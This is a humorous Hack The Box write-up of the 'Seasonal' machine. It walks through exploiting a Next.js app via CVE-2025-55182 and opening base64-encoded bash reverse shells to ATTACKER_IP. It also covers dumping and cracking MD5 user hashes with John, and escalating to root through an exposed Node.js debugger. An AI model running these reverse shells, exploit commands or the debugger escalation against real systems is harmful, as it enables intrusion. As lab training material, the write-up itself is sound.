Yo hackers 👋
Happy Eid first ❤️
I’m 0xbosh and this is my writeup for the Seasonal machine from Hack The Box.
Quick disclaimer before the elite hackers jump me in comments:
I’m still beginner in cyber security ya ged3an 😭
My main thing is Web Pentest & Bug Bounty.
HTB for me is basically:
“break stuff → suffer → google → suffer more → root shell somehow”
It is for fun . So yeah… let’s cook 🍳
Machine Info
Difficulty : Easy
OS: Linux
Release Date : May 24, 2026
Recon 🔍
Started with the holy command every HTB player types before even thinking:
nmap -A MACHINE_IPFound:
Port 22 → SSH
Port 3000 → Web App
Now listen…
Whenever I see port 3000 i asked chatgpt what is this and he say :
“ah yes… another JavaScript developer fighting demons in production”
Enumeration 🕵️
Opened the site and checked it with Wappalyzer.
Boom:
Next.js 15.0.3At this point I knew somebody definitely forgot to patch something 💀
So I searched a bit and found:
CVE-2025-55182 — React2ShellBasically:
“Congratulations. Your React app is now my terminal.”
Amazing technology honestly.
Initial Access — React2Shell 🚀
Grabbed public exploit and tested command execution:
python3 CVE-2025-55182.py MACHINE_IP:3000 -c "ls"BOOM 💥
RCE confirmed.
But shell was not interactive.
Classic HTB behavior:
“Here bro take shell… but suffer first.”
Started listener:
rlwrap nc -lnvp 4444Then tried normal reverse shell:
python3 CVE-2025-55182.py MACHINE_IP:3000 \
-c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"Result?
500 Internal Server ErrorThe server basically told me:
“ew brother ew what’s this syntax”
so i asked my fu*king gpt what should i make and he tell me the solution is on base64 Abdallah .
Base64 Reverse Shell Because Life is Pain
Encoded payload:
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' | base64 -w 0Then executed:
python3 exploit.py --url MACHINE_IP:3000 \
--cmd "echo BASE64_TEXT | base64 -d | bash"And finally…
node@reactor:/opt/reactor-app$SHEEEEESH 😭🔥
Shell obtained.
At this point I was typing commands like I pay rent there.
Loot Time 🗃️
While snooping around I found:
reactor.dbNow any hacker seeing .db file instantly turns into raccoon searching trash cans.
Opened database:
sqlite3 /opt/reactor-app/reactor.db.tables
SELECT * FROM users;Output:
1|admin|a203b22191d744a4e70ada5c101b17b8|administrator
2|engineer|39d97110eafe2a9a68639812cd271e8e|operatorSaw admin hash and immediately said:
“admin hash? yeah let’s pretend we didn’t see that”
So I focused on engineer hash instead.
Cracking Passwords Like a Respectful Criminal 🔓
Saved hash:
echo "39d97110eafe2a9a68639812cd271e8e" > hashAsked GPT about type of hash and he tell me :
May Be MD2 , MD5 , “LD+some thing i can’t remember wallahy”
Used John:
john --wordlist=/usr/share/wordlists/rockyou.txt \
hash --format=Raw-MD5Output:
reactor1SSH Access
ssh engineer@MACHINE_IPPassword:
reactor1And we in ✅
User flag owned.
At this moment I felt like Mr Robot…
Reality:
I still asked google about basic bash syntax sometimes.
Privilege Escalation ⬆️
First thing:
idOutput:
uid=1000(engineer)Not root yet.
Pain.
Looking for Stupid Stuff 👀
Checked listening ports:
ss -tulpnSaw this:
127.0.0.1:9229The second I saw 9229 I almost started laughing.
Because port 9229 means:
Node.js DebuggerAnd if Node debugger is exposed on privileged process?
Bro just hand me the root flag already 💀
Port Forwarding
Debugger only accessible locally.
So I made SSH tunnel:
ssh -L 9229:127.0.0.1:9229 engineer@MACHINE_IPNow my machine can talk to debugger like we’re childhood friends.
Open Listener in My Machine on 4444 Port
Root Shell Time 😈
Connected:
node inspect localhost:9229Then executed:
exec("process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\"')")Basically I told the root-owned Node process:
“ya habibi open terminal real quick”
And because the process was running as root…
uid=0(root)ROOTED ON Listener , Cat Root Flag🔥🔥
Machine cooked.
Admin crying.
Electricity bill unpaid.
Flags 🚩
User flag ✅
Root flag ✅
Ego increased dangerously ✅
Final Words
Fun machine honestly.
10/10 experience.
Would absolutely emotionally abuse myself with this machine again.